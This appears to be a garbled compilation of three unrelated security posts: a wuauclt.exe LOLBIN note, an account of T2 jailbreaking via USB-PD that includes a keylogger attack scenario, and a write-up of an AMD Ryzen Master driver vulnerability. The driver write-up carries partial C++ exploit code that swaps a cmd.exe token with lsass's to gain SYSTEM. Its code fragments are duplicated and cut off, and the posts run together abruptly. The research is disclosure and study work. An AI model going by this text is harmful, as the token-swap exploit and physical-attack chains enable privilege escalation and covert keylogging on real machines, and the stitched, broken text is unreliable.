Its been a few months since my last post about uploading and downloading data with certreq.exe as a potential alternative to certutil.exe in LOLBIN land. I’ve been having a blast starting my new role in the MDSec ActiveBreach team.
Today I wanted to share something a little more juicy. Enter the ‘WSUS Useful Client’ as they describe here. The Windows Update client (wuauclt.exe) is a bit elusive with only small number of Microsoft articles about it [1][2] and these articles do not seem to document all of the available command line options.
This binary lives here:
C:\Windows\System32\wuauclt.exe
I discovered (When I get a chance I will be sharing further details of the methodology I used to find this on a blog post @MDSecLabs) you can gain code execution by specifying an arbitrary DLL with the following command line options on the test Windows 10 systems I tried:
There’s some fantastic work already in the community for raising the awareness of LOLBINs and for sharing new candidates and their capabilities with the excellent LOLBAS project. I have made the following pull request to this project:
Finally, come and hang out at the RedTeamSec Discord here. It’s been great to see this community grow over the past few months, with some great content being shared.
and the T2 For those just joining us, news broke last week about the jailbreaking of Apple’s T2 security processor in recent Macs. If you haven’t read it yet, you can catch up on the story here, and try this out yourself at home using the latest build of checkra1n. So far we’ve stated that you must put the computer into DFU before you can run checkra1n to jailbreak the T2 and that remains true, however today we are introducing a demo of replacing a target Mac’s EFI and releasing details on the T2 debug interface. A Monkey by any Other Name In order to build their products unlike app developers Apple has to debug the core operating system. This is how firmware, the kernel and the debugger itself are built and debugged. From the earliest days of the iPod, Apple has built specialized debug probes for building their products. These devices are leaked from Apple headquarters and their factories and have traditionally had monkey related names such as the “Kong”, “Kanzi” and “Chimp”. They work by allowing access to special debug pins of the CPU, (which for ARM devices is called Serial Wire Debug or SWD), as well as other chips via JTAG and UART. JTAG is a powerful protocol allowing direct access to the components of a device and access generally provides the ability to circumvent most security measures. Apple has even spoken about their debug capabilities in a BlackHat talk describing the security measures in effect. Apple has even deployed versions of these to their retail locations allowing for repair of their iPads and Macs. The Bonobo in the Myst Another hardware hacker and security researcher Ramtin Amin did work last year to create an effective clone of the Kanzi cable. This combined with the checkm8 vulnerability from axi0mX allows iPhones 5s — X to be debugged. The USB port on the Mac One of the interesting questions is how does the Macs share a USB port with both the Intel CPU (macOS) and the T2 (bridgeOS) for DFU. These are essentially separate computers inside of the case sharing the same pins. Schematics of the MacBook leaked from Apple’s vendors (a quick search with a part number and “schematic”), and analysis of the USB-C firmware update payload show that there is a component on each port which is tasked with both multiplexing (allowing the port to be shared) as well as terminating USB power delivery (USB-PD) for the charging of the MacBook or connected devices. Further analysis shows that this port is shared between the following:
The Thunderbolt controller which allows the port to be used by macOS as Thunderbolt, USB3 or DisplayPort The T2 USB host for DFU recovery Various UART serial lines The debug pins of the T2 The debug pins of the Intel CPU for debugging EFI and the kernel of macOS
Like the above documentation related to the iPhone, the debug lanes of a Mac are only available if enabled via the T2. Prior to the checkm8 bug this required a specially signed payload from Apple, meaning that Apple has a skeleton key to debug any device including production machines. Thanks to checkm8, any T2 can be demoted, and the debug functionality can be enabled. Unfortunately Intel has placed large amounts of information about the Thunderbolt controllers and protocol under NDA, meaning that it has not been properly researched leading to a string of vulnerabilities over the years. The USB-C Plug and USB-PD
Given that the USB-C port on the Mac does many things, it is necessary to indicate to the multiplexer what device inside the Mac you’d like to connect too. The USB-C port specification provides pins for this exact purpose (CC1/CC2) as well as detecting the orientation of the cable allowing for it to be reversible. On top of the CC pins runs another low speed protocol called USB-PD or USB power delivery. It is primarily used to negotiate power requirements between chargers(sources) and devices (sinks). USB-PD also allows for arbitrary packets of information in what are called “Vendor Defined Messages” or VDMs.
Apple’s USB-PD Extensions The VDM allows Apple to trigger actions and specify the target of a USB-C connection. We have discovered USB-PD payloads that cause the T2 to be rebooted and for the T2 to be held into a DFU state. Putting these two actions together, we can cause the T2 to restart ready to be jailbroken by checkra1n without any user interaction. While we haven’t tested a Apple Serial Number Reader, we suspect it works in a similar fashion, allowing the devices ECID and Serial Number to be read from the T2’s DFU reliably. The Mac also speaks USB-PD to other devices, such as when an iPad Pro is connected in DFU mode. Apple needs to document the entire set of VDM messages used in their products so that consumers can understand the security risks. The set of commands we issue are unauthenticated, and even if they were they were undocumented and thus un-reviewed. Apple could have prevented this scenario by requiring that some physical attestation occurs during these VDMs such as holding down the power button at the same time.
Putting it Together Taking all this information into account, we can string it together to reflect a real world attack. By creating a specialized device about the size of a power charger, we can place a T2 into DFU mode, run checkra1n, replace the EFI and upload a key logger to capture all keys. This is possible even though macOS is un-altered (the logo at boot is for effect but need not be done). This is because in Mac portables the keyboard is directly connected to the T2 and passed through to macOS.
VIDEO DEMO PlugNPwn is the entry into DFU directly from connecting a cable to the DFU port (if it doesn’t show, it may be your AdBlock: https://youtu.be/LRoTr0HQP1U)
PlugN’Pwn Automatic Jailbreak In the next video we use
In order to facilitate further research on the topic of USB-PD security, and to allow users at home to perform similar experiments we are pleased to announce pre-ordereing of our USB-PD screamer. It allows a computer to directly «speak» USB-PD to a target device. Get more info here:
This miniature USB-to-Power Delivery adapter lets you experiment with USB Power Deliver protocol and discover hidden functionality in various Type-C devices.
Capabilities you might discover include but are not limited to serial ports, debug ports (SWD, JTAG, etc.), automatic restart, automatic entry to firmware update boot-loader.
Tested to work with Apple Type-C devices such as iPad Pro and MacBook (T1 and T2) to expose all functionality listed above (SWD does not work on iPad because no downgrade is available).
WARNING! This probe is NOT an SWD/Serial probe by itself. It only allows you to send needed PD packets to mux SWD/Serial out and exposes it on the test pads. If you want to use SWD/Serial, you WILL need another SWD/Serial probe/adapter upstream connected to the test pads.
ABSOLUTELY NOT for experiments with 9/15/20v or anything other than 5v.
Only for arbitrary PD messages.
Dimensions: 10x15mm (excluding type-c plug)
Connectivity: USB to control custom PD messages, test points for USB-Top, USB-Bottom, and SBU lines for connection to upstream devices to utilize the exposed functionality.
Earlier this year I was really focused on Windows exploit development and was working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn and eventually went bug hunting on my own.
I ended up discovering what could be described as a logic bug in the ATI Technologies Inc. driver ‘atillk64.sys’. Being new to the Windows driver bug hunting space, I didn’t realize that this driver had already been analyzed and classified as vulnerable by Jesse Michael and his colleague Mickey in their ‘Screwed Drivers’github repo. It had also been mentioned in several other places that have been pointed out to me since.
So I didn’t really feel like I had discovered my first real bug and decided to hunt similar bugs on Windows 3rd party drivers until I found my own in the AMD Ryzen Master AMDRyzenMasterDriver.sys version 15.
I have since stopped looking for these types of bugs as I believe they wouldn’t really help me progress skills wise and my goals have changed since.
Thanks
Huge thanks to the following people for being so charitable, publishing things, messaging me back, encouraging me, and helping me along the way:
The AMD Ryzen Master Utility is a tool for CPU overclocking. The software purportedly supports a growing list of processors and allows users fine-grained control over the performance settings of their CPU. You can read about it here
This vulnerability is extremely similar to my last Windows driver post, so please give that a once-over if this one lacks any depth and leaves you curious. I will try my best to limit the redudancy with the previous post.
All of my analysis was performed on Windows 10
Build 18362.19h1_release.190318-1202
.
I picked this driver as a target because it is common of 3rd-party Windows drivers responsible for hardware configurations or diagnostics to make available to low-privileged users powerful routines that directly read from or write to physical memory.
Checking Permissions
The first thing I did after installing AMD Ryzen Master using the default installer was to locate the driver in OSR’s Device Tree utility and check its permissions. This is the first thing I was checking during this period because I had read that Microsoft did not consider a violation of the security boundary between Administrator and SYSTEM to be a serious violation. I wanted to ensure that my targets were all accessible from lower privileged users and groups.
Luckily for me, Device Tree indicated that the driver allowed all Authenticated Users to read and modify the driver.
Finding Interesting IOCTL Routines
Write What Where Routine
Next, I started looking at the driver in in a free version of IDA. A search for
MmMapIoSpace
returned quite a few places in which the api was cross referenced. I just began going down the list to see what code paths could reach these calls.
The first result,
sub_140007278
, looked very interesting to me.
We don’t know at this point if we control the API parameters in this routine but looking at the routine statically you can see that we make our call to
MmMapIoSpace
, it stores the returned pointer value in
[rsp+48h+BaseAddress]
and does a check to make sure the return value was not
NULL
. If we have a valid pointer, we then progress into this loop routine on the bottom left.
At the start of the looping routine, we can see that
eax
gets the value of
dword ptr [rsp+48h+NumberOfBytes]
and then we compare
eax
to
[rsp+48h+var_24]
. This makes some sense because we already know from looking at the API call that
[rsp+48h+NumberOfBytes]
held the
NumberOfBytes
parameter for
MmMapIoSpace
. So essentially what this is looking like is, a check to see if a counter variable has reached our
NumberOfBytes
value. A quick highlight of
eax
shows that later it takes on the value of
[rsp+48h+var_24]
, is incremented, and then
eax
is put back into
[rsp+48h+var_24]
. Then we’re back at the top of our loop where
eax
is set equal to
NumberOfBytes
before every check.
So this to me looked interesting, we can see that we’re doing something in a loop, byte by byte, until our
NumberOfBytes
value is reached. Once that value is reached, we see the other branch in our loop when our
NumberOfBytes
value is reached is a call to
MmUnmapIoSpace
.
Looking a bit closer at the loop, we can see a few interesting things.
ecx
is essentially a counter here as its set equal to our already mentioned counters
eax
and
[rsp+48h+var_24]
. We also see there is a
mov
to
[rdx+rcx]
from
al
. A single byte is written to the location of
rdx
+
rcx
. So we can make a guess that
rdx
is a base address and
rcx
is an offset. This is what a traditional
for
loop would seem to look like disassembled.
al
is taken from another similar construction in
[r8+rax]
where
rax
is now acting as the offset and
r8
is a different base address.
So all in all, I decided this looks like a routine that is either doing a byte by byte read or a byte by byte write to kernel memory most likely. But if you look closely, you can see that the pointer returned from
MmMapIoSpace
is the one that
al
is written to (while tracking an offset) because it is eventually moved into
rdx
for the
mov [rdx+rcx], al
operation. This was exciting for me because if we can control the parameters of
MmMapIoSpace
, we will possibly be able to specify a physical memory address and offset and copy a user controlled buffer into that space once it is mapped into our process space. This is essentially a write what where primitive!
Looking at the first cross-reference to this routine, I started working my way back up the call graph until I was able to locate a probable IOCTL code.
After banging my head against my desk for hours trying to pass all of the checks to reach our glorious write what where routine, I was finally able to reach it and get a reliable BSOD. The checks were looking at the sizes of my input and output buffers supplied to my
DeviceIoControl
call. I was able to solve this by simply stringing together random length buffers of something like
AAAAAAAABBBBBBBBCCCCCCCC
etc, and seeing how the program would parse my input. Eventually I was able to figure out that the input buffer was structured as follows:
first 8 bytes of my input buffer would be the desired physical address you want mapped,
the next 4 bytes would represent the
NumberOfBytes
parameter,
and finally, and this is what took me the longest, the next 8 bytes were to be a pointer to the buffer you wanted to overwrite the mapped kernel memory with.
Very cool! We have control over all the
MmMapIoSpace
params except
CacheType
and we can specify what buffer to copy over!
This is progress, I was fairly certain at this point I had a write primitive; however, I wasn’t exactly sure what to do with it. At this point, I reasoned that if a routine existed to do a byte by byte write to a kernel buffer somewhere, I probably also had the ability to do a byte by byte read of a kernel buffer. So I set out to find my routine’s sibling, the read what where routine (if she existed).
Read What Where
Now I went back to the other cross references of
MmMapIoSpace
calls and eventually came upon this routine,
sub_1400063D0
.
You’d be forgiven if you think it looks just like the last routine we analyzed, I know I did and missed it initially; however, this routine differs in one major way. Instead of copying byte by byte out of our process space buffer and into a kernel buffer, we are copying byte by byte out of a kernel buffer and into our process space buffer. I will spare you the technical analysis here but it is essentially our other routine except only the source and destinations are reversed! This is our read what where primitive and I was able to back track a cross reference in IDA to this IOCTL.
There were a lot of rabbit holes here to go down but eventually this one ended up being straightforward once I found a clear cut code path to the routine from the IOCTL call graph.
Once again, we control the important
MmMapIoSpace
parameters and, this is a difference from the other IOCTL, the byte by byte transfer occurs in our
DeviceIoControl
output buffer argument at an offset of
0xC
bytes. So we can tell the driver to read physical memory from an arbitrary address, for an arbitrary length, and send us the results!
With these two powerful primitives, I tried to recreate my previous exploitation strategy employed in my last post.
Exploitation
Here I will try to walk through some code snippets and explain my thinking. Apologies for any programming mistakes in this PoC code; however, it works reliably on all the testing I performed (and it worked well enough for AMD to patch the driver.)
First, we’ll need to understand what I’m fishing for here. As I explained in my previous post, I tried to employ the same strategy that @b33f did with his driver exploit and fish for
"Proc"
tags in the kernel pool memory. Please refer to that post for any questions here. The TL;DR here is that information about processes are stored in the
EPROCESS
structure in the kernel and some of the important members for our purposes are:
ImageFileName
(this is the name of the process)
UniqueProcessId
(the PID)
Token
(this is a security token value)
The offsets from the beginning of the structure to these members was as follows on my build:
Each data structure in the kernel pool has various headers, (thanks to ReWolf for breaking this down so well):
POOL_HEADER
structure (this is where our
"Proc"
tag will reside),
OBJECT_HEADER_xxx_INFO
structures,
OBJECT_HEADER
which, contains a
Body
where the
EPROCESS
structure lives.
As b33f explains, in his write-up, all of the addresses where one begins looking for a
"Proc"
tag are
0x10
aligned, so every address here ends in a
0
. We know that at some arbitrary address ending in
0
, if we look at
<address> + 0x4
that is where a
"Proc"
tag might be.
Leveraging Read What Where
The difficulty on my Windows build was that the length from my
"Proc"
tag once found, to the beginning of the
EPROCESS
structure where I know the offsets to the members I want varied wildly. So much so that in order to get the exploit working reliably, I just simply had to create my own data structure and store instances of them in a vector. The data structure was as follows:
// This address might not be page-aligned to 0x1000
// so find out how far off from a multiple of
// 0x1000 we are. This value is stored in our
// PROC_DATA struct in the page_entry_offset
// member.
INT64 modulus = temp_addr % 0x1000;
proc_data.page_entry_offset.push_back(modulus);
// This is the page-aligned address where, either
// small or large paged memory will hold our "Proc"
// chunk. We store this as our proc_address member
// in PROC_DATA.
INT64 page_address = temp_addr - modulus;
proc_data.proc_address.push_back(
page_address);
proc_data.header_size.push_back(x);
}
}
}
}
It will be more obvious with the entire exploit code, but what I’m doing here is basically starting from a physical address, and calling our read what where with a read size of
0x100c
(
0x1000
+
0xc
as required so we can capture a whole page of memory and still keep our returned metadata information that starts at offset
0xc
in our output buffer) in a loop all the while adding these discovered
PROC_DATA
structures to a vector. Once we hit our max address or max iterations, we’ll send this vector over to a second routine that parses out all the data we care about like the
EPROCESS
members we care about.
It is important to note that I took great care to make sure that all calls to
MmMapIoSpace
used page-aligned physical addresses as this is the most stable way to call the API
Now that I knew exactly how many
"Proc"
chunks I had found and stored all their relevant metadata in a vector, I could start a second routine that would use that metadata to check for their
EPROCESS
member values to see if they were processes I cared about.
My strategy here was to find the
EPROCESS
members for a privileged process such as
lsass.exe
and swap its security token with the security token of a
cmd.exe
process that I owned. You can see a portion of that code here:
if (system_tokens.token_name.size() != 0 and cmd_token_address != 0) {
cout << "\n[>] cmd.exe and SYSTEM token information found!\n";
cout << "[>] Let's swap tokens!\n";
}
else if (cmd_token_address == 0) {
cout << "[!] No cmd.exe token address found, exiting...\n";
exit(1);
}
So now at this point I had the location and values of every thing I cared about and it was time to leverage the Write What Where routine we had found.
Leveraging Write What Where
The problem I was facing was that I need my calls to
MmMapIoSpace
to be page-aligned so that the calls remain stable and we don’t get any unnecessary BSODs.
So let’s picture a page of memory as a line.
<—————–MEMORY PAGE—————–>
We can only write in page-size chunks; however, the value we want to overwrite, the value of the
cmd.exe
process’s
Token
, is most-likely not page-aligned. So now we have this:
<———TOKEN——————————->
I could do a direct write at the exact address of this
Token
value, but my call to
MmMapIoSpace
would not be page-aligned.
So what I did was one more Read What Where call to store everything on that page of memory in a buffer and then overwrite the
cmd.exe
Token
with the
lsass.exe
Token
and then use that buffer in my call to the Write What Where routine.
So instead of an 8 byte write to simply overwrite the value, I’d be opting to completely overwrite that entire page of memory but only changing 8 bytes, that way the calls to
MmMapIoSpace
stay clean.
You can see some of that math in the code snippet below with references to
modulus
. Remember that the Write What Where utilized the input buffer of
DeviceIoControl
as the buffer it would copy over into the kernel memory:
if (!DeviceIoControl(
hFile,
READ_IOCTL,
&input_buff,
0x40,
output_buff,
modulus + 0xc,
&bytes_ret,
NULL))
{
cout << "[!] Failed the read operation to copy the cmd.exe page...\n";
cout << "[!] Last error: " << hex << GetLastError() << "\n";
exit(1);
}
// This struct will hold the address of a "Proc" tag's page entry,
// that Proc chunk's header size, and how far into the page the "Proc" tag is
struct PROC_DATA {
std::vector<INT64> proc_address;
std::vector<INT64> page_entry_offset;
std::vector<INT64> header_size;
};
// This address might not be page-aligned to 0x1000
// so find out how far off from a multiple of
// 0x1000 we are. This value is stored in our
// PROC_DATA struct in the page_entry_offset
// member.
INT64 modulus = temp_addr % 0x1000;
proc_data.page_entry_offset.push_back(modulus);
// This is the page-aligned address where, either
// small or large paged memory will hold our "Proc"
// chunk. We store this as our proc_address member
// in PROC_DATA.
INT64 page_address = temp_addr - modulus;
proc_data.proc_address.push_back(
page_address);
proc_data.header_size.push_back(x);
}
}
}
}
}
}